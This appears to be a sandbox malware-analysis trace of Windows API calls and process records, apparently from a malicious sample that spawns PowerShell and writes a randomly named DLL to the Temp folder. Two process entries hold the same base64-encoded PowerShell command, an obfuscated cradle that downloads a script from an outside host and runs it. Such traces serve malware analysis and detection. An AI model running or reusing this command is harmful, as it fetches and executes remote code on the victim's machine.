	[0875.234] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x30385f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30385f8, pfQOP=0x0) returned 0x0
	[0875.234] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0875.234] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 3407
	[0875.235] recv (in: s=0x4cc, buf=0x30124e4, len=13009, flags=0 | out: buf=0x30124e4*) returned 13009
	[0875.360] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3038838, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3038838, pfQOP=0x0) returned 0x0
	[0875.361] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0875.362] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 1994
	[0875.362] recv (in: s=0x4cc, buf=0x3011f5f, len=14422, flags=0 | out: buf=0x3011f5f*) returned 10720
	[0875.448] recv (in: s=0x4cc, buf=0x301493f, len=3702, flags=0 | out: buf=0x301493f*) returned 3702
	[0875.495] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3038ac8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3038ac8, pfQOP=0x0) returned 0x0
	[0875.496] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0875.496] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 581
	[0875.496] recv (in: s=0x4cc, buf=0x30119da, len=15835, flags=0 | out: buf=0x30119da*) returned 15835
	[0875.614] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3038d08, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3038d08, pfQOP=0x0) returned 0x0
	[0875.615] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0875.615] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 3456
	[0875.616] recv (in: s=0x4cc, buf=0x3012515, len=12960, flags=0 | out: buf=0x3012515*) returned 8576
	[0875.691] recv (in: s=0x4cc, buf=0x3014695, len=4384, flags=0 | out: buf=0x3014695*) returned 2680
	[0875.691] recv (in: s=0x4cc, buf=0x301510d, len=1704, flags=0 | out: buf=0x301510d*) returned 1608
	[0875.691] recv (in: s=0x4cc, buf=0x3015755, len=96, flags=0 | out: buf=0x3015755*) returned 96
	[0875.727] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3038f70, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3038f70, pfQOP=0x0) returned 0x0
	[0875.728] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0875.728] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 2043
	[0875.728] recv (in: s=0x4cc, buf=0x3011f90, len=14373, flags=0 | out: buf=0x3011f90*) returned 14373
	[0875.824] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x30391b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30391b0, pfQOP=0x0) returned 0x0
	[0875.825] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0875.825] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 1702
	[0875.825] recv (in: s=0x4cc, buf=0x3011e3b, len=14714, flags=0 | out: buf=0x3011e3b*) returned 14714
	[0875.916] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3039418, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3039418, pfQOP=0x0) returned 0x0
	[0875.917] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0875.917] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 289
	[0875.917] recv (in: s=0x4cc, buf=0x30118b6, len=16127, flags=0 | out: buf=0x30118b6*) returned 16127
	[0876.019] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3039658, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3039658, pfQOP=0x0) returned 0x0
	[0876.020] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0876.020] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 2092
	[0876.020] recv (in: s=0x4cc, buf=0x3011fc1, len=14324, flags=0 | out: buf=0x3011fc1*) returned 8576
	[0876.431] recv (in: s=0x4cc, buf=0x3014141, len=5748, flags=0 | out: buf=0x3014141*) returned 3216
	[0876.432] recv (in: s=0x4cc, buf=0x3014dd1, len=2532, flags=0 | out: buf=0x3014dd1*) returned 1072
	[0876.434] recv (in: s=0x4cc, buf=0x3015201, len=1460, flags=0 | out: buf=0x3015201*) returned 1460
	[0876.436] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3039898, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3039898, pfQOP=0x0) returned 0x0
	[0876.437] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0876.437] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 5503
	[0876.437] recv (in: s=0x4cc, buf=0x3012d14, len=10913, flags=0 | out: buf=0x3012d14*) returned 10913
	[0876.607] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3039ad8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3039ad8, pfQOP=0x0) returned 0x0
	[0876.608] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0876.608] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 2482
	[0876.608] recv (in: s=0x4cc, buf=0x3012147, len=13934, flags=0 | out: buf=0x3012147*) returned 13934
	[0876.754] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3039d40, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3039d40, pfQOP=0x0) returned 0x0
	[0876.755] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0876.755] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 3213
	[0876.755] recv (in: s=0x4cc, buf=0x3012422, len=13203, flags=0 | out: buf=0x3012422*) returned 13203
	[0876.847] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3039f80, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3039f80, pfQOP=0x0) returned 0x0
	[0876.848] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0876.848] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 3944
	[0876.848] recv (in: s=0x4cc, buf=0x30126fd, len=12472, flags=0 | out: buf=0x30126fd*) returned 5360
	[0876.954] recv (in: s=0x4cc, buf=0x3013bed, len=7112, flags=0 | out: buf=0x3013bed*) returned 7112
	[0876.954] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303a1c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303a1c0, pfQOP=0x0) returned 0x0
	[0876.955] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0876.955] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 5747
	[0876.955] recv (in: s=0x4cc, buf=0x3012e08, len=10669, flags=0 | out: buf=0x3012e08*) returned 10669
	[0877.040] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303a400, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303a400, pfQOP=0x0) returned 0x0
	[0877.041] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0877.041] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 8086
	[0877.041] recv (in: s=0x4cc, buf=0x301372b, len=8330, flags=0 | out: buf=0x301372b*) returned 8330
	[0877.135] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303a668, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303a668, pfQOP=0x0) returned 0x0
	[0877.137] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0877.137] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 8281
	[0877.138] recv (in: s=0x4cc, buf=0x30137ee, len=8135, flags=0 | out: buf=0x30137ee*) returned 3472
	[0877.218] recv (in: s=0x4cc, buf=0x301457e, len=4663, flags=0 | out: buf=0x301457e*) returned 1888
	[0877.218] recv (in: s=0x4cc, buf=0x3014cde, len=2775, flags=0 | out: buf=0x3014cde*) returned 2775
	[0877.224] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303a8a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303a8a8, pfQOP=0x0) returned 0x0
	[0877.227] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0877.227] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 13300
	[0877.227] recv (in: s=0x4cc, buf=0x3014b89, len=3116, flags=0 | out: buf=0x3014b89*) returned 3116
	[0877.553] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303aae8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303aae8, pfQOP=0x0) returned 0x0
	[0877.553] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0877.554] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 16416
	[0877.554] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303ad28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303ad28, pfQOP=0x0) returned 0x0
	[0877.555] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0877.555] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 2434
	[0877.555] recv (in: s=0x4cc, buf=0x3012117, len=13982, flags=0 | out: buf=0x3012117*) returned 13982
	[0877.802] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303afb8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303afb8, pfQOP=0x0) returned 0x0
	[0877.803] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0877.803] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 6917
	[0877.803] recv (in: s=0x4cc, buf=0x301329a, len=9499, flags=0 | out: buf=0x301329a*) returned 9499
	[0877.893] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303b1f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303b1f8, pfQOP=0x0) returned 0x0
	[0877.896] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0877.896] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 8720
	[0877.896] recv (in: s=0x4cc, buf=0x30139a5, len=7696, flags=0 | out: buf=0x30139a5*) returned 3472
	[0877.975] recv (in: s=0x4cc, buf=0x3014735, len=4224, flags=0 | out: buf=0x3014735*) returned 1888
	[0877.975] recv (in: s=0x4cc, buf=0x3014e95, len=2336, flags=0 | out: buf=0x3014e95*) returned 1072
	[0877.975] recv (in: s=0x4cc, buf=0x30152c5, len=1264, flags=0 | out: buf=0x30152c5*) returned 1264
	[0877.981] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303b438, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303b438, pfQOP=0x0) returned 0x0
	[0877.983] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0877.983] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 7307
	[0877.983] recv (in: s=0x4cc, buf=0x3013420, len=9109, flags=0 | out: buf=0x3013420*) returned 9109
	[0877.985] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303b678, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303b678, pfQOP=0x0) returned 0x0
	[0877.986] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0877.986] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 534
	[0877.987] recv (in: s=0x4cc, buf=0x30119ab, len=15882, flags=0 | out: buf=0x30119ab*) returned 15882
	[0878.081] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303b8e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303b8e0, pfQOP=0x0) returned 0x0
	[0878.084] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0878.084] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 7697
	[0878.084] recv (in: s=0x4cc, buf=0x30135a6, len=8719, flags=0 | out: buf=0x30135a6*) returned 8719
	[0878.319] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303bb20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303bb20, pfQOP=0x0) returned 0x0
	[0878.322] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0878.322] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 15932
	[0878.323] recv (in: s=0x4cc, buf=0x30155d1, len=484, flags=0 | out: buf=0x30155d1*) returned 484
	[0878.411] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303bd60, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303bd60, pfQOP=0x0) returned 0x0
	[0878.413] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0878.414] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 8623
	[0878.414] recv (in: s=0x4cc, buf=0x3013944, len=7793, flags=0 | out: buf=0x3013944*) returned 3472
	[0878.416] recv (in: s=0x4cc, buf=0x30146d4, len=4321, flags=0 | out: buf=0x30146d4*) returned 4321
	[0878.417] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303bfa0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303bfa0, pfQOP=0x0) returned 0x0
	[0878.417] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0878.418] recv (in: s=0x4cc, buf=0x3011795, len=4752, flags=0 | out: buf=0x3011795*) returned 4752
	[0878.418] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x303c1b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x303c1b8, pfQOP=0x0) returned 0x0
	[0878.424] SetEvent (hEvent=0x3ac) returned 1
	[0901.378] CoTaskMemAlloc (cb=0x104) returned 0x13b3c0
	[0901.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13b3c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0901.378] CoTaskMemFree (pv=0x13b3c0) 
	[0901.379] CoTaskMemAlloc (cb=0x104) returned 0x13b3c0
	[0901.379] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x13b3c0, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0901.379] CoTaskMemFree (pv=0x13b3c0) 
	[0901.385] CoTaskMemAlloc (cb=0x104) returned 0x13b3c0
	[0901.385] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x13b3c0, nSize=0x80 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24
	[0901.385] CoTaskMemFree (pv=0x13b3c0) 
	[0939.400] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5P5NRG~1\\", lpszLongPath=0x1c86d110, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 0x1e
	[0939.400] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", nBufferLength=0x105, lpBuffer=0x1c86d190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll", lpFilePart=0x0) returned 0x3f
	[0939.400] SetErrorMode (uMode=0x1) returned 0x1
	[0939.400] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vThQexNegi.dll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vthqexnegi.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff
	[0954.388] SetErrorMode (uMode=0x1) returned 0x1
	[0954.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c86aaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c86a9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c86a9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c86a9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0955.502] CoTaskMemAlloc (cb=0x104) returned 0x13b3c0
	[0955.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13b3c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.502] CoTaskMemFree (pv=0x13b3c0) 

Thread:
	id = 1782
	os_tid = 0x1c68


Thread:
	id = 1788
	os_tid = 0x1e54


Thread:
	id = 1790
	os_tid = 0x13c0

	[0841.030] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0841.034] ResetEvent (hEvent=0x3ac) returned 1

Thread:
	id = 1845
	os_tid = 0x245c


Process:
	id = "73"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x26b74000"
	os_pid = "0x960"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 344
	os_tid = 0xcac


Thread:
	id = 433
	os_tid = 0x10b0


Thread:
	id = 435
	os_tid = 0x10b8


Thread:
	id = 2030
	os_tid = 0x27a8


Thread:
	id = 2032
	os_tid = 0x27b0


Thread:
	id = 2039
	os_tid = 0x27cc


Thread:
	id = 2087
	os_tid = 0x20e0


Process:
	id = "74"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x26782000"
	os_pid = "0xd28"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 347
	os_tid = 0x318

	[0485.201] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0487.640] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0487.641] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0487.641] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0487.641] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0495.976] GetVersionExW (in: lpVersionInformation=0x1edc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1edc00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0495.978] GetVersionExW (in: lpVersionInformation=0x1edc00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1edc00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0495.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0496.741] GetVersionExW (in: lpVersionInformation=0x1ed970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed970*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0496.742] SetErrorMode (uMode=0x1) returned 0x1
	[0496.743] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1edad0 | out: lpFileInformation=0x1edad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0496.744] SetErrorMode (uMode=0x1) returned 0x1
	[0496.748] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1edd40 | out: lpdwHandle=0x1edd40) returned 0x94c
	[0496.750] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c372d8 | out: lpData=0x2c372d8) returned 1
	[0496.752] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1edcb8, puLen=0x1edcb0 | out: lplpBuffer=0x1edcb8*=0x2c37374, puLen=0x1edcb0) returned 1
	[0496.755] lstrlenW (lpString="䅁") returned 1
	[0496.764] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x2c37450, puLen=0x1edc20) returned 1
	[0496.765] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0496.767] CoTaskMemAlloc (cb=0x2e) returned 0x401100
	[0496.767] lstrcpyW (in: lpString1=0x401100, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0496.768] CoTaskMemFree (pv=0x401100) 
	[0496.768] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1edc28, puLen=0x1edc20 | out: lplpBuffer=0x1edc28*=0x2c374a4, puLen=0x1edc20) returned 1
	[0496.768] lstrlenW (lpString="System.Management.Automation") returned 28
	[0496.768] CoTaskMemAlloc (cb=0x3c) returned 0x339860
